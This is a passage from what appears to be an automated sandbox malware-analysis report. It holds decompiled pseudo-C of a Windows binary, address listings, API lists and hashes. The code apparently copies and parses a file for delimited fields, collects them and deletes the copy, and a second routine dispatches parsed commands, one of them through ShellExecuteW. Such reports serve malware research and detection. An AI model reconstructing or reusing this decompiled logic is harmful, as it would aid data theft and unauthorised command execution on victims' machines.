                                                                                                                                                                        				signed int _t241;
                                                                                                                                                                        				void* _t264;
                                                                                                                                                                        				intOrPtr _t265;
                                                                                                                                                                        				void* _t267;
                                                                                                                                                                        				void* _t270;
                                                                                                                                                                        				void* _t271;
                                                                                                                                                                        				intOrPtr _t273;
                                                                                                                                                                        				intOrPtr* _t276;
                                                                                                                                                                        				void* _t278;
                                                                                                                                                                        
                                                                                                                                                                        				_v88 = __edx;
                                                                                                                                                                        				_v84 = __ecx;
                                                                                                                                                                        				if(_a8 == 0) {
                                                                                                                                                                        					L50:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t104 =  *0x40e38c; // 0x6f4f70
                                                                                                                                                                        				_v76 = _v76 & 0x00000000;
                                                                                                                                                                        				_v48 = _t104;
                                                                                                                                                                        				_t105 =  *0x40e380; // 0x6f5150
                                                                                                                                                                        				_v80 = _t105;
                                                                                                                                                                        				_t106 =  *0x40e2cc; // 0x6d5a38
                                                                                                                                                                        				_v52 = _t106;
                                                                                                                                                                        				_t107 =  *0x40e320; // 0x6d5c98
                                                                                                                                                                        				_v56 = _t107;
                                                                                                                                                                        				_t108 =  *0x40e384; // 0x6f5060
                                                                                                                                                                        				_v64 = _t108;
                                                                                                                                                                        				_t110 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_v36 = _t111;
                                                                                                                                                                        				_t264 =  *((intOrPtr*)( *0x40e000))(_t110, _a4,  *0x40e300);
                                                                                                                                                                        				_v68 = _t264;
                                                                                                                                                                        				_t113 = E0040A69E( *0x40e000,  &_v36);
                                                                                                                                                                        				_t209 = _v36;
                                                                                                                                                                        				if(_t113 == 0) {
                                                                                                                                                                        					L48:
                                                                                                                                                                        					LocalFree(_t264);
                                                                                                                                                                        					DeleteFileW(_t209);
                                                                                                                                                                        					LocalFree(_t209);
                                                                                                                                                                        					L49:
                                                                                                                                                                        					goto L50;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_t209);
                                                                                                                                                                        				_push(_t264);
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e184))() == 0) {
                                                                                                                                                                        					goto L48;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t119 =  *((intOrPtr*)( *0x40e03c))(_t209, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                        				_v72 = _t119;
                                                                                                                                                                        				_t270 =  *((intOrPtr*)( *0x40e14c))(_t119, 0);
                                                                                                                                                                        				_t121 =  *((intOrPtr*)( *0x40e044))(0x40, _t270);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push( &_v76);
                                                                                                                                                                        				_t18 = _t270 - 1; // -1
                                                                                                                                                                        				_v44 = _t121;
                                                                                                                                                                        				_push(_t121);
                                                                                                                                                                        				_push(_v72);
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e088))() == 0) {
                                                                                                                                                                        					L43:
                                                                                                                                                                        					LocalFree(_v44);
                                                                                                                                                                        					CloseHandle(_v72);
                                                                                                                                                                        					DeleteFileW(_t209);
                                                                                                                                                                        					if(_t264 != 0) {
                                                                                                                                                                        						LocalFree(_t264);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t209 != 0) {
                                                                                                                                                                        						LocalFree(_t209);
                                                                                                                                                                        					}
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t271 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _a4, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        				_t22 = _t271 + 0x40; // 0x40
                                                                                                                                                                        				_t132 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
                                                                                                                                                                        				_v40 = _t132;
                                                                                                                                                                        				if(_t271 == 0) {
                                                                                                                                                                        					L7:
                                                                                                                                                                        					_push(_v40);
                                                                                                                                                                        					_t133 =  *0x40e490; // 0x6dcca7f0
                                                                                                                                                                        					if( *_t133() != 0) {
                                                                                                                                                                        						L42:
                                                                                                                                                                        						 *0x40e4a8();
                                                                                                                                                                        						LocalFree(_v40);
                                                                                                                                                                        						goto L43;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t228 = _v44;
                                                                                                                                                                        					_t265 = _t228;
                                                                                                                                                                        					_push(_t228);
                                                                                                                                                                        					_v32 = _t265;
                                                                                                                                                                        					_t273 = 1;
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e198))() <= 0x200) {
                                                                                                                                                                        						L41:
                                                                                                                                                                        						_t264 = _v68;
                                                                                                                                                                        						goto L42;
                                                                                                                                                                        					}
                                                                                                                                                                        					while(_t273 != 0) {
                                                                                                                                                                        						_v60 = _v60 & 0x00000000;
                                                                                                                                                                        						_t140 =  *((intOrPtr*)( *0x40e00c))(_t265, _v48);
                                                                                                                                                                        						_v20 = _v20 | 0xffffffff;
                                                                                                                                                                        						_t210 = _t140;
                                                                                                                                                                        						_v16 = _v16 | 0xffffffff;
                                                                                                                                                                        						if(_t210 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t211 = _t210 - _t265;
                                                                                                                                                                        						if(_t210 - _t265 < 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t142 =  *((intOrPtr*)( *0x40e00c))(_t265, _v80);
                                                                                                                                                                        						if(_t142 == 0) {
                                                                                                                                                                        							_t273 = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_v20 = _t142 - _t265;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v8 = _t273;
                                                                                                                                                                        						_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
                                                                                                                                                                        						_a8 = _t144;
                                                                                                                                                                        						_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
                                                                                                                                                                        						_v24 = _t146;
                                                                                                                                                                        						_t147 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
                                                                                                                                                                        						_push(_v20);
                                                                                                                                                                        						_v28 = _t147;
                                                                                                                                                                        						if(E0040A457(_t265,  &_a8,  *((intOrPtr*)( *0x40e198))() + _t211, _v48) == 0) {
                                                                                                                                                                        							L38:
                                                                                                                                                                        							LocalFree(_a8);
                                                                                                                                                                        							LocalFree(_v24);
                                                                                                                                                                        							LocalFree(_v28);
                                                                                                                                                                        							_t212 = _v16;
                                                                                                                                                                        							if(_t212 < 0) {
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t265 = _t265 +  *((intOrPtr*)( *0x40e198))(_v64) + _t212;
                                                                                                                                                                        							_push(_t265);
                                                                                                                                                                        							_v32 = _t265;
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e198))() > 0x200) {
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							break;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t160 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
                                                                                                                                                                        							_v12 = _t160;
                                                                                                                                                                        							_t163 = MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, 0, 0);
                                                                                                                                                                        							_v20 = _t163;
                                                                                                                                                                        							if(_t163 != 0) {
                                                                                                                                                                        								_t267 = _t163 + _t163;
                                                                                                                                                                        								_t196 =  *((intOrPtr*)( *0x40e044))(0x40, _t267);
                                                                                                                                                                        								_t216 = _t196;
                                                                                                                                                                        								MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, _t216, _v20);
                                                                                                                                                                        								 *((short*)(_t267 + _t216 - 2)) = 0;
                                                                                                                                                                        								_v12 =  *((intOrPtr*)( *0x40e13c))(_v12, _t216);
                                                                                                                                                                        								LocalFree(_t216);
                                                                                                                                                                        								_t265 = _v32;
                                                                                                                                                                        								_v60 = 1;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t165 =  *((intOrPtr*)( *0x40e00c))(_t265, _v52);
                                                                                                                                                                        							if(_t165 == 0) {
                                                                                                                                                                        								L36:
                                                                                                                                                                        								_t273 = 0;
                                                                                                                                                                        								L37:
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								goto L38;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t273 = _v8;
                                                                                                                                                                        							_t167 = _t165 - _t265;
                                                                                                                                                                        							_v20 = _t167;
                                                                                                                                                                        							if(_t167 < 0) {
                                                                                                                                                                        								goto L37;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t213 =  *((intOrPtr*)( *0x40e00c))(_t265, _v56);
                                                                                                                                                                        							if(_t213 == 0) {
                                                                                                                                                                        								goto L36;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t214 = _t213 - _t265;
                                                                                                                                                                        							if(_t214 >= 0) {
                                                                                                                                                                        								_push(_t214);
                                                                                                                                                                        								if(E0040A457(_t265,  &_v24,  *((intOrPtr*)( *0x40e198))() + _v20, _v52) != 0) {
                                                                                                                                                                        									_v20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
                                                                                                                                                                        									E00406468(_v24,  &_v20);
                                                                                                                                                                        									_t240 =  *((intOrPtr*)( *0x40e00c))(_t265, _v64);
                                                                                                                                                                        									if(_t240 == 0) {
                                                                                                                                                                        										_t273 = 0;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t241 = _t240 - _t265;
                                                                                                                                                                        										_v92 = _t241;
                                                                                                                                                                        										_v16 = _t241;
                                                                                                                                                                        										if(_t241 >= 0) {
                                                                                                                                                                        											_push(_t241);
                                                                                                                                                                        											_v16 = _t241;
                                                                                                                                                                        											if(E0040A457(_t265,  &_v28,  *((intOrPtr*)( *0x40e198))() + _t214, _v56) != 0) {
                                                                                                                                                                        												_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
                                                                                                                                                                        												if(E00406468(_v28,  &_v16) != 0 && _v60 != 0) {
                                                                                                                                                                        													_t190 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        													_t215 = _t190;
                                                                                                                                                                        													_t191 =  *((intOrPtr*)( *0x40e0ec))(_t215,  *0x40e1a4, _v12, _v20, _v16);
                                                                                                                                                                        													_t278 = _t278 + 0x14;
                                                                                                                                                                        													if(_t191 >= lstrlenW( *0x40e1a4)) {
                                                                                                                                                                        														_t276 = _v84;
                                                                                                                                                                        														 *_t276 = E0040A503( *_t276, _t215);
                                                                                                                                                                        													}
                                                                                                                                                                        													if(_t215 != 0) {
                                                                                                                                                                        														LocalFree(_t215);
                                                                                                                                                                        													}
                                                                                                                                                                        													_t265 = _v32;
                                                                                                                                                                        													 *_v88 =  *_v88 + 1;
                                                                                                                                                                        												}
                                                                                                                                                                        												LocalFree(_v16);
                                                                                                                                                                        												_t273 = _v8;
                                                                                                                                                                        												_v16 = _v92;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_v20);
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L37;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t209 = _v36;
                                                                                                                                                                        					goto L41;
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_t271);
                                                                                                                                                                        				_push(_t132);
                                                                                                                                                                        				_push(0xffffffff);
                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0xfde9);
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e0e4))() != 0) {
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					LocalFree(_v44);
                                                                                                                                                                        					LocalFree(_t264);
                                                                                                                                                                        					LocalFree(_t209);
                                                                                                                                                                        					LocalFree(_v40);
                                                                                                                                                                        					goto L49;
                                                                                                                                                                        				}
                                                                                                                                                                        			}



































































                                                                                                                                                                        0x00406d33
                                                                                                                                                                        0x00406d36
                                                                                                                                                                        0x00406d39
                                                                                                                                                                        0x0040720c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040720c
                                                                                                                                                                        0x00406d3f
                                                                                                                                                                        0x00406d49
                                                                                                                                                                        0x00406d4d
                                                                                                                                                                        0x00406d50
                                                                                                                                                                        0x00406d55
                                                                                                                                                                        0x00406d58
                                                                                                                                                                        0x00406d5d
                                                                                                                                                                        0x00406d60
                                                                                                                                                                        0x00406d65
                                                                                                                                                                        0x00406d68
                                                                                                                                                                        0x00406d6e
                                                                                                                                                                        0x00406d78
                                                                                                                                                                        0x00406d85
                                                                                                                                                                        0x00406d96
                                                                                                                                                                        0x00406d9c
                                                                                                                                                                        0x00406da1
                                                                                                                                                                        0x00406da4
                                                                                                                                                                        0x00406da9
                                                                                                                                                                        0x00406dae
                                                                                                                                                                        0x004071f7
                                                                                                                                                                        0x004071f8
                                                                                                                                                                        0x004071ff
                                                                                                                                                                        0x00407206
                                                                                                                                                                        0x00407206
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407206
                                                                                                                                                                        0x00406dbc
                                                                                                                                                                        0x00406dbd
                                                                                                                                                                        0x00406dbe
                                                                                                                                                                        0x00406dc3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406ddb
                                                                                                                                                                        0x00406de5
                                                                                                                                                                        0x00406df0
                                                                                                                                                                        0x00406df5
                                                                                                                                                                        0x00406e00
                                                                                                                                                                        0x00406e02
                                                                                                                                                                        0x00406e03
                                                                                                                                                                        0x00406e06
                                                                                                                                                                        0x00406e0a
                                                                                                                                                                        0x00406e0b
                                                                                                                                                                        0x00406e12
                                                                                                                                                                        0x004071c3
                                                                                                                                                                        0x004071c6
                                                                                                                                                                        0x004071cf
                                                                                                                                                                        0x004071d6
                                                                                                                                                                        0x004071de
                                                                                                                                                                        0x004071e1
                                                                                                                                                                        0x004071e1
                                                                                                                                                                        0x004071e9
                                                                                                                                                                        0x004071ec
                                                                                                                                                                        0x004071ec
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004071f4
                                                                                                                                                                        0x00406e36
                                                                                                                                                                        0x00406e38
                                                                                                                                                                        0x00406e3e
                                                                                                                                                                        0x00406e40
                                                                                                                                                                        0x00406e45
                                                                                                                                                                        0x00406e83
                                                                                                                                                                        0x00406e83
                                                                                                                                                                        0x00406e86
                                                                                                                                                                        0x00406e90
                                                                                                                                                                        0x004071b4
                                                                                                                                                                        0x004071b4
                                                                                                                                                                        0x004071bd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004071bd
                                                                                                                                                                        0x00406e96
                                                                                                                                                                        0x00406ea0
                                                                                                                                                                        0x00406ea2
                                                                                                                                                                        0x00406ea3
                                                                                                                                                                        0x00406ea6
                                                                                                                                                                        0x00406eae
                                                                                                                                                                        0x004071b1
                                                                                                                                                                        0x004071b1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004071b1
                                                                                                                                                                        0x00406eb4
                                                                                                                                                                        0x00406ec4
                                                                                                                                                                        0x00406ec9
                                                                                                                                                                        0x00406ecb
                                                                                                                                                                        0x00406ecf
                                                                                                                                                                        0x00406ed1
                                                                                                                                                                        0x00406ed7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406edd
                                                                                                                                                                        0x00406edf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406eee
                                                                                                                                                                        0x00406ef2
                                                                                                                                                                        0x00406efb
                                                                                                                                                                        0x00406ef4
                                                                                                                                                                        0x00406ef6
                                                                                                                                                                        0x00406ef6
                                                                                                                                                                        0x00406f09
                                                                                                                                                                        0x00406f0c
                                                                                                                                                                        0x00406f13
                                                                                                                                                                        0x00406f1d
                                                                                                                                                                        0x00406f2c
                                                                                                                                                                        0x00406f2f
                                                                                                                                                                        0x00406f31
                                                                                                                                                                        0x00406f3d
                                                                                                                                                                        0x00406f53
                                                                                                                                                                        0x00407168
                                                                                                                                                                        0x0040716b
                                                                                                                                                                        0x00407174
                                                                                                                                                                        0x0040717d
                                                                                                                                                                        0x00407183
                                                                                                                                                                        0x00407188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407196
                                                                                                                                                                        0x0040719d
                                                                                                                                                                        0x0040719e
                                                                                                                                                                        0x004071a8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406f59
                                                                                                                                                                        0x00406f65
                                                                                                                                                                        0x00406f76
                                                                                                                                                                        0x00406f8b
                                                                                                                                                                        0x00406f8d
                                                                                                                                                                        0x00406f92
                                                                                                                                                                        0x00406f9a
                                                                                                                                                                        0x00406fa0
                                                                                                                                                                        0x00406fab
                                                                                                                                                                        0x00406fc5
                                                                                                                                                                        0x00406fcd
                                                                                                                                                                        0x00406fda
                                                                                                                                                                        0x00406fdd
                                                                                                                                                                        0x00406fe3
                                                                                                                                                                        0x00406fe6
                                                                                                                                                                        0x00406fe6
                                                                                                                                                                        0x00406ff6
                                                                                                                                                                        0x00406ffa
                                                                                                                                                                        0x0040715d
                                                                                                                                                                        0x0040715d
                                                                                                                                                                        0x0040715f
                                                                                                                                                                        0x00407162
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407162
                                                                                                                                                                        0x00407000
                                                                                                                                                                        0x00407003
                                                                                                                                                                        0x00407005
                                                                                                                                                                        0x00407008
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407019
                                                                                                                                                                        0x0040701d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407023
                                                                                                                                                                        0x00407027
                                                                                                                                                                        0x00407032
                                                                                                                                                                        0x0040704a
                                                                                                                                                                        0x00407064
                                                                                                                                                                        0x00407067
                                                                                                                                                                        0x00407077
                                                                                                                                                                        0x0040707b
                                                                                                                                                                        0x00407150
                                                                                                                                                                        0x00407081
                                                                                                                                                                        0x00407081
                                                                                                                                                                        0x00407085
                                                                                                                                                                        0x00407088
                                                                                                                                                                        0x0040708b
                                                                                                                                                                        0x00407096
                                                                                                                                                                        0x0040709a
                                                                                                                                                                        0x004070b0
                                                                                                                                                                        0x004070ca
                                                                                                                                                                        0x004070d4
                                                                                                                                                                        0x004070e8
                                                                                                                                                                        0x004070f3
                                                                                                                                                                        0x00407108
                                                                                                                                                                        0x0040710a
                                                                                                                                                                        0x00407119
                                                                                                                                                                        0x0040711b
                                                                                                                                                                        0x00407127
                                                                                                                                                                        0x00407127
                                                                                                                                                                        0x0040712b
                                                                                                                                                                        0x0040712e
                                                                                                                                                                        0x0040712e
                                                                                                                                                                        0x00407137
                                                                                                                                                                        0x0040713a
                                                                                                                                                                        0x0040713a
                                                                                                                                                                        0x0040713f
                                                                                                                                                                        0x00407148
                                                                                                                                                                        0x0040714b
                                                                                                                                                                        0x0040714b
                                                                                                                                                                        0x004070b0
                                                                                                                                                                        0x0040708b
                                                                                                                                                                        0x00407155
                                                                                                                                                                        0x00407155
                                                                                                                                                                        0x0040704a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407027
                                                                                                                                                                        0x00406f53
                                                                                                                                                                        0x004071ae
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004071ae
                                                                                                                                                                        0x00406e4f
                                                                                                                                                                        0x00406e50
                                                                                                                                                                        0x00406e51
                                                                                                                                                                        0x00406e52
                                                                                                                                                                        0x00406e53
                                                                                                                                                                        0x00406e55
                                                                                                                                                                        0x00406e58
                                                                                                                                                                        0x00406e59
                                                                                                                                                                        0x00406e62
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406e64
                                                                                                                                                                        0x00406e67
                                                                                                                                                                        0x00406e6e
                                                                                                                                                                        0x00406e75
                                                                                                                                                                        0x00407206
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407206

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406E67
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406E6E
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00406E75
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,00000000), ref: 00406F8B
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,000000FF), ref: 00406FC5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00406FDD
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004071C6
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 004071CF
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 004071D6
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004071E1
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004071EC
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004071F8
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 004071FF
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00407206
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal$ByteCharDeleteFileMultiWide$CloseHandle
                                                                                                                                                                        • String ID: 8Zm$PQo$`Po$pOo$zh@
                                                                                                                                                                        • API String ID: 490209112-2002017703
                                                                                                                                                                        • Opcode ID: 2c3a4ddb3ba3feb35c1dcfdcabd393495abc93af20cb4a2b392ebe35311604a6
                                                                                                                                                                        • Instruction ID: f5ae4f6584a7baff5169ccf4eff2fbd10138ea77d31ce010a22c6c2769712165
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c3a4ddb3ba3feb35c1dcfdcabd393495abc93af20cb4a2b392ebe35311604a6
                                                                                                                                                                        • Instruction Fuzzy Hash: D6E18471A00215AFEB04DFA6DD85EAEBBB5EF48310F004439FA15B7390DBB46911CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                        			E004073C7() {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				void* __ecx;
                                                                                                                                                                        				void* _t65;
                                                                                                                                                                        				void* _t72;
                                                                                                                                                                        				void* _t79;
                                                                                                                                                                        				void* _t86;
                                                                                                                                                                        				void* _t97;
                                                                                                                                                                        				void* _t108;
                                                                                                                                                                        				void* _t122;
                                                                                                                                                                        				void* _t123;
                                                                                                                                                                        				char _t128;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				void* _t139;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				void* _t142;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				void* _t183;
                                                                                                                                                                        				intOrPtr _t188;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				void* _t192;
                                                                                                                                                                        				void* _t194;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        				void* _t198;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				void* _t202;
                                                                                                                                                                        				signed int _t205;
                                                                                                                                                                        				void* _t207;
                                                                                                                                                                        				signed int _t209;
                                                                                                                                                                        				void* _t211;
                                                                                                                                                                        				signed int _t213;
                                                                                                                                                                        				void* _t215;
                                                                                                                                                                        				signed int _t217;
                                                                                                                                                                        				char _t218;
                                                                                                                                                                        				void* _t219;
                                                                                                                                                                        				void* _t222;
                                                                                                                                                                        				void* _t223;
                                                                                                                                                                        
                                                                                                                                                                        				_t190 =  *((intOrPtr*)( *0x40e18c))(_t144,  *0x40e3a0, _t189);
                                                                                                                                                                        				if(_t190 == 0) {
                                                                                                                                                                        					L41:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t192 = _t190 + 8;
                                                                                                                                                                        						_t65 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t192) + _t63);
                                                                                                                                                                        						_t137 = _t65;
                                                                                                                                                                        						_v20 = _t137;
                                                                                                                                                                        						_t202 =  *((intOrPtr*)( *0x40e18c))(_t192,  *0x40e1f0);
                                                                                                                                                                        						if(_t202 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t205 = _t202 - _t192 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t192,  &_v20, 0, _t205) == 0) {
                                                                                                                                                                        							_t137 = _v20;
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t194 = _t192 + _t205 * 2 + 2;
                                                                                                                                                                        						_t72 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t194) + _t70);
                                                                                                                                                                        						_t139 = _t72;
                                                                                                                                                                        						_v12 = _t139;
                                                                                                                                                                        						_t207 =  *((intOrPtr*)( *0x40e18c))(_t194,  *0x40e20c);
                                                                                                                                                                        						if(_t207 == 0) {
                                                                                                                                                                        							L36:
                                                                                                                                                                        							LocalFree(_t139);
                                                                                                                                                                        							L34:
                                                                                                                                                                        							LocalFree(_v20);
                                                                                                                                                                        							L39:
                                                                                                                                                                        							L40:
                                                                                                                                                                        							goto L41;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t209 = _t207 - _t194 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t194,  &_v12, 0, _t209) == 0) {
                                                                                                                                                                        							_t139 = _v12;
                                                                                                                                                                        							goto L36;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t196 = _t194 + _t209 * 2 + 2;
                                                                                                                                                                        						_t79 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t196) + _t77);
                                                                                                                                                                        						_t140 = _t79;
                                                                                                                                                                        						_v8 = _t140;
                                                                                                                                                                        						_t211 =  *((intOrPtr*)( *0x40e18c))(_t196,  *0x40e20c);
                                                                                                                                                                        						if(_t211 == 0) {
                                                                                                                                                                        							L33:
                                                                                                                                                                        							LocalFree(_t140);
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							goto L34;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t213 = _t211 - _t196 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t196,  &_v8, 0, _t213) == 0) {
                                                                                                                                                                        							_t140 = _v8;
                                                                                                                                                                        							goto L33;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t198 = _t196 + _t213 * 2 + 2;
                                                                                                                                                                        						_t86 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t198) + _t84);
                                                                                                                                                                        						_t137 = _t86;
                                                                                                                                                                        						_v16 = _t137;
                                                                                                                                                                        						_t215 =  *((intOrPtr*)( *0x40e18c))(_t198,  *0x40e228);
                                                                                                                                                                        						if(_t215 == 0) {
                                                                                                                                                                        							L31:
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							LocalFree(_v20);
                                                                                                                                                                        							L29:
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t217 = _t215 - _t198 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t198,  &_v16, 0, _t217) == 0) {
                                                                                                                                                                        							_t137 = _v16;
                                                                                                                                                                        							goto L31;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t15 = _t217 + 1; // 0x1
                                                                                                                                                                        						_t199 = _v20;
                                                                                                                                                                        						_v32 = _t198 + _t15 * 2;
                                                                                                                                                                        						_push(_t199);
                                                                                                                                                                        						if( *((intOrPtr*)( *0x40e074))() != 1) {
                                                                                                                                                                        							_push(_t199);
                                                                                                                                                                        							if( *((intOrPtr*)( *0x40e074))() != 2) {
                                                                                                                                                                        								_push(_t199);
                                                                                                                                                                        								if( *((intOrPtr*)( *0x40e074))() == 3) {
                                                                                                                                                                        									ShellExecuteW(0, L"open", _v16, _v12, 0, 0);
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							L24:
                                                                                                                                                                        							_t97 = _v8;
                                                                                                                                                                        							L25:
                                                                                                                                                                        							LocalFree(_t97);
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							LocalFree(_t199);
                                                                                                                                                                        							LocalFree(_v16);
                                                                                                                                                                        							_t190 =  *((intOrPtr*)( *0x40e18c))(_v32,  *0x40e3a0);
                                                                                                                                                                        							if(_t190 != 0) {
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L40;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t97 = _v8;
                                                                                                                                                                        						if( *_t97 != 0x25) {
                                                                                                                                                                        							goto L25;
